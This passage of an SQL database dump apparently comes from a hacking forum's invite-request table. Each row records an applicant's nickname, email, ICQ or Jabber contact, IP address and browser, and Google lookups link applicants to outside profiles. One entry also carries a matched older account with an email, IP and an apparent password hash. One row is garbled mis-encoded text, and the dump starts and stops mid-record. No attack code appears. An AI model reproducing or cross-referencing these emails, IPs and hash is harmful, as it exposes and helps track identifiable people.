\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1620, 1454, 0, 'Invite', 2, '{$name}', 1408194646, '[SIZE=\'4\'][COLOR=\'Sienna\']Dr.XzErO[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ: 923286\n[b]e-mail[/b]: xzero_team@gmx.at\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 86.56.226.62\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://do4a.com/members/dr-zero.43772/ | https://do4a.com/members/dr-zero.43772/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1764, 1067, 1086, '123', 41, '', 1408803863, 'Úðúþù-тþ утырþчýыù рõÑÂ, тðü ñыû þÿõýøúѠ/pads/www/delivery/afr.php\nýþ òыôðõт 404', 1, 0, '', 0, 1, 0, 0, 0), (1622, 1455, 0, 'Invite', 2, '{$name}', 1408199371, '[SIZE=\'4\'][COLOR=\'Sienna\']iefuzzer[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: sh@priv.in\n[b]e-mail[/b]: iefuzzer@hotmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 123.113.188.172\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://shazzer.co.uk/user/iefuzzer | http://shazzer.co.uk/user/iefuzzer \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1623, 1456, 0, 'Invite', 2, '{$name}', 1408202613, '[SIZE=\'4\'][COLOR=\'Sienna\']M3sRine[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: mesrine@exploit.im\n[b]e-mail[/b]: akrapovicdz@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.98.60.126\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://m3srine.nooszone.yuku.com | m3srine.nooszone.yuku.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1624, 1457, 0, 'Invite', 2, '{$name}', 1408206675, '[SIZE=\'4\'][COLOR=\'Sienna\']nhocvip[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: jacker2007@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 42.116.223.28\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://nhocvip.wix.com | nhocvip.wix.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1625, 1458, 0, 'Invite', 2, '{$name}', 1408212369, '[SIZE=\'4\'][COLOR=\'Sienna\']Mr_AnarShi-T[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: w-98@live.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 197.28.103.152\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1626, 1459, 0, 'Invite', 2, '{$name}', 1408214671, '[SIZE=\'4\'][COLOR=\'Sienna\']kxp[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: vbv@sj.ms\n[b]e-mail[/b]: toptoptopbhw@hotmail.com\n[b]Info[/b]: Coding: C++ (Win32), Delphi/Pascal, PHP\r\nHacking: SQL inj, XSS and so on\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 95.28.108.131\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 ( .NET CLR 3.0.04506.648; .NET4.0C)\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/kxp_spb | http://vk.com/kxp_spb \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1627, 1460, 0, 'Invite', 2, '{$name}', 1408215917, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email@123.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 173.254.216.66\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1628, 1461, 0, 'Invite', 2, '{$name}', 1408218155, '[SIZE=\'4\'][COLOR=\'Sienna\']Dr.SHA6H[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: s2dd2m@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 83.96.96.135\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1; rv:23.0) Gecko/20100101 Firefox/23.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.youtube.com/user/SHA67Dr | http://www.youtube.com/user/SHA67Dr \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1629, 1462, 0, 'Invite', 2, '{$name}', 1408219133, '[SIZE=\'4\'][COLOR=\'Sienna\']0x4h4x[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: 0x4h4x@mail.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 186.251.8.66\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://0x4h4x.deviantart.com | 0x4h4x.deviantart.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1630, 1463, 0, 'Invite', 2, '{$name}', 1408219550, '[SIZE=\'4\'][COLOR=\'Sienna\']h0x[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: h0x@undermail.org\n[b]e-mail[/b]: h0x@undermail.org\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\nWeb Hacker ++\r\nExploit Development\r\n\r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 77.247.181.164\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.drupal.ru/blog/85990 | http://www.drupal.ru/blog/85990 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1631, 1464, 0, 'Invite', 2, '{$name}', 1408221866, '[SIZE=\'4\'][COLOR=\'Sienna\']windburn[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 5521453\n[b]e-mail[/b]: zettich@zettich.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.53.181.147\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.76 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1632, 1465, 0, 'Invite', 2, '{$name}', 1408222461, '[SIZE=\'4\'][COLOR=\'Sienna\']zettich[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 118909595\n[b]e-mail[/b]: zettich@zettich.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.53.181.147\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.76 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/messju/status/2357578638 | https://twitter.com/messju/status/2357578638 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1633, 1466, 0, 'Invite', 2, '{$name}', 1408227626, '[SIZE=\'4\'][COLOR=\'Sienna\']Maximus[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Alexusmaximus@icloud.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.146.83.215\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : MaXiMuS : maksimerasov@mail.ru : 81.88.212.154 : abe191d171af9ff1e9d31e5e123e6714\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://maximus.aero | maximus.aero \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1634, 1467, 0, 'Invite', 2, '{$name}', 1408227628, '[SIZE=\'4\'][COLOR=\'Sienna\']Maximus[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Alexusmaximus@icloud.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.146.83.215\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : MaXiMuS : maksimerasov@mail.ru : 81.88.212.154 : abe191d171af9ff1e9d31e5e123e6714\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://maximus.aero | maximus.aero \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1635, 1468, 0, 'Invite', 2, '{$name}', 1408228065, '[SIZE=\'4\'][COLOR=\'Sienna\']x3n70x[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: x3n70x@exploit.im\n[b]e-mail[/b]: x3n70x@hush.ai\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 79.134.235.132\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://x3n70x.unedqsvyn1.biz | x3n70x.unedqsvyn1.biz \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1636, 1469, 0, 'Invite', 2, '{$name}', 1408243484, '[SIZE=\'4\'][COLOR=\'Sienna\']3r3b0s[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 3r3b0s@dcdark.net\n[b]e-mail[/b]: 3r3b0s@safe-mail.net\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 184.97.141.48\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.0; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.lolpro.com/members/3R3B0S | http://www.lolpro.com/members/3R3B0S \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1637, 1470, 0, 'Invite', 2, '{$name}', 1408243588, '[SIZE=\'4\'][COLOR=\'Sienna\']3r3b0s[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 3r3b0s@dcdark.net\n[b]e-mail[/b]: 3r3b0s@safe-mail.net\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 184.97.141.48\n[*][b]real ip[/b]: 184.97.141.48\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.0; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.lolpro.com/members/3R3B0S | http://www.lolpro.com/members/3R3B0S \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1638, 1471, 0, 'Invite', 2, '{$name}', 1408244428, '[SIZE=\'4\'][COLOR=\'Sienna\']Scrack[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 